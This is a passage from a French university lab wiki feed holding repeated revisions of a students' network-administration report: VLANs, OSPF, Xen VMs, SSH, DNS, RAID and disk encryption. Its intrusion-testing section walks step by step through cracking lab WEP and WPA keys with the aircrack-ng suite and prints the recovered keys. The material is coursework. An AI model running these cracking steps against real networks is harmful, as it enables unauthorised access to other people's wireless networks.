 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57704</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57704"/>
				<updated>2022-01-10T16:10:02Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
 fdisk -l&lt;br /&gt;
 #sélection de la clé à formater&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
 o #creation table MBR&lt;br /&gt;
 n #creation nouvelle partition&lt;br /&gt;
 w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
 cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
 #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
 mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57703</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57703"/>
				<updated>2022-01-10T16:09:31Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
